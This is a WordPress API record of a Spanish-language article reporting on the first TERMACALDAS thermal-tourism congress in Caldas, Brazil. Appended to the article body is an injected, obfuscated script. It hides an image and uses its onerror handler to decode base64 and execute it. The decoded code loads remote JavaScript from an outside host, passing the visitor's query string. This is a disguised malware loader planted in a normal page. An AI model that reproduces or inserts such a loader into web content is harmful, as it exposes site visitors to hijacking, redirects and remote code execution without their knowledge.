{"id":5477,"date":"2022-07-05T10:21:13","date_gmt":"2022-07-05T13:21:13","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5477"},"modified":"2025-08-13T16:17:28","modified_gmt":"2025-08-13T19:17:28","slug":"culmino-el-1o-termacaldas-en-brasil-sellando-un-hito-para-el-termalismo-latinoamericano","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5477","title":{"rendered":"Culmin\u00f3 el 1\u00ba TERMACALDAS en Brasil sellando un hito para el termalismo Latinoamericano"},"content":{"rendered":"\n<h6 class=\"has-text-align-right wp-block-heading\"> <span style=\"color:#abb8c3\" class=\"tadv-color\">Maximiliano P\u00e9rez Joos<\/span><\/h6>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg\" alt=\"\" class=\"wp-image-5470\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_27-5-2022_185555_www.termatalia.com_.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#043856\"><em>Las aguas termales siguen \u201cderramando\u201d conocimientos atrav\u00e9s de los estudios y experiencias del termalismo y el turismo, rememorando su pasado y narrando nuevas historias para el futuro. Pues es qu\u00e9, la relaci\u00f3n entre humanos y las \u201caguas calientes\u201d es tan antigua como la humanidad misma. Y en los tiempos que corren del siglo XXI est\u00e1n m\u00e1s presentes que nunca<\/em>.<\/h5>\n\n\n\n<p><strong><em>Un nuevo espacio para debatir y crear conocimientos<\/em><\/strong><\/p>\n\n\n\n<p>As\u00ed qued\u00f3 plasmado en el sure\u00f1o municipio de <strong>Caldas<\/strong>, Estado de Minas Gerais, donde fue llevado a cabo entre el 23 y 26 de junio el <em>1\u00ba Congreso Internacional sobre Termalismo y Destinos Tur\u00edsticos Saludables atrav\u00e9s de las Aguas Minerales<\/em>, tambi\u00e9n denominado <strong>TERMACALDAS<\/strong>. El evento tuvo lugar en el hist\u00f3rico y reconocido Grand Hotel Pocinhos, establecimiento hotelero de gran renombre por sus instalaciones y albergar adesde 1886 a importantes personalidades.&nbsp;<\/p>\n\n\n\n<p>En el marco del turismo, la salud y las aguas termo-medicinales, el congreso realiz\u00f3 un gran aporte al conocimiento de dichas \u00e1reas, la divulgaci\u00f3n de trabajos acad\u00e9micos y cient\u00edficos y la presentaci\u00f3n mediante experiencias de canales de actuaci\u00f3n a desarrollar en el futuro pr\u00f3ximo en materia de hidrolog\u00eda medica, termalismo social y turismo termal.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"http:\/\/asicotur.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"728\" height=\"90\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/202109-ASICOTUR-banner-1.gif\" alt=\"\" class=\"wp-image-5366\" \/><\/a><\/figure>\n\n\n\n<p><strong>M\u00e1s de veinte disertantes<\/strong> El acontecimiento cont\u00f3 con la relevante presencia de los m\u00e1s prestigiosos termalistas y actores relacionados a la materia de todo el Brasil, entre los presentes el Dr. Marcos Untura, Dr. Fernando Bignardi, Dra. Teresa Alvisi, entre otros. Adem\u00e1s, de los exponentes &nbsp;internacionales, Dr. Francisco Maraver (Espa\u00f1a) y el Mgrt. Maximiliano P\u00e9rez Joos (Argentina). Asimismo, se dieron lugar en la cita empresarios y representantes de gobierno de otras ciudades<\/p>\n\n\n\n<p>termales brasile\u00f1as como Aguas de Lindoia, Aguas de San Pedro, Caldas Novas, Po\u00e7os de Caldas, entre otras.<\/p>\n\n\n\n<p>Las conferencias cient\u00edficas expuestas se agruparon en diversos paneles que trataron temas como la medicina termal y sus contribuciones, los peloides y arcillas, factores naturales terap\u00e9uticos, rutas termales y culturales, est\u00e9tica y legislaci\u00f3n de las aguas, como as\u00ed tambi\u00e9n tuvo su espacio el <em>termalismo social<\/em>, actividad pionera en Brasil y de la cual el destino alfitri\u00f3n es ejemplo por los tratamientos ofrecidos a su comunidad local y regional en el balneario <strong>Pocinhos do R\u00edo Verde<\/strong>, el cual coordina la Dra. Jussara Marrichi bajo la gesti\u00f3n del intendente municipal de Caldas Sr. Ailton Goulart, ambos propulsores del termalismo y turismo a nivel local y estadual.<\/p>\n\n\n\n<p><strong>Una comunidad entera comprometida con las aguas termales<\/strong><\/p>\n\n\n\n<p>Las pr\u00e1cticas termales, bien sean orientadas a la salud (termalismo) o turismo (termal y bienestar) son acompa\u00f1adas por otras actividades y atractivos del lugar (Caldas) que incluyen espacios naturales (cascadas, sierras, senderos), arquitectura y arte hist\u00f3rico y patrimonio inmaterial por medio de eventos programados (fiesta del biscocho) o as\u00ed tambi\u00e9n las pr\u00e1cticas termales, las qu\u00e9, en el marco del congreso fueron expuestas mediante un acabado documental que se torna el primer <em>registro hist\u00f3rico del uso terap\u00e9utico de las aguas como bien inmaterial, <\/em>reuniendo en \u00e9l m\u00e1s de 150 a\u00f1os de hist\u00f3ria. Es menester aclarar, que el Balneario Pocinhos do R\u00edo Verde fue reacondicionado y puesto en marcha hace un escaso periodo de tiempo y es de administraci\u00f3n municipal (local). Retomando a la cultura inmaterial, el municipio mediante la Secretar\u00eda de Cultura que dirige el Dr. Geraldo Magella articula y promueve tur\u00edsticamente las costumbres, ritos y artesanatos de las dos comunidades originarias del lugar, la aldea Kiriri do R\u00edo Verde y la aldea Xucuru Kariri, ambas con participaci\u00f3n en el nombrado evento.<\/p>\n\n\n\n<p>Con todo esto y superando las expectativas de sus organizadores, disertantes y asistentes, el 1\u00ba TERMACALDAS logr\u00f3 posicionarse a nivel local e internacional siendo mas que un evento, se\u00f1al de un hecho hist\u00f3rico para el termalismo brasile\u00f1o, dejando as\u00ed a los amantes de la materia anhelando nuevas ediciones.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Maximiliano P\u00e9rez Joos Las aguas termales siguen \u201cderramando\u201d conocimientos atrav\u00e9s de los estudios y experiencias del termalismo y el turismo, rememorando su pasado y narrando nuevas historias para el futuro. Pues es qu\u00e9, la relaci\u00f3n entre humanos y las \u201caguas calientes\u201d es tan antigua como la humanidad misma. Y en los tiempos que corren del [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5478,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,17],"tags":[],"class_list":["post-5477","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5477","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5477"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5477\/revisions"}],"predecessor-version":[{"id":10639,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5477\/revisions\/10639"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5478"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5477"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5477"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5477"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}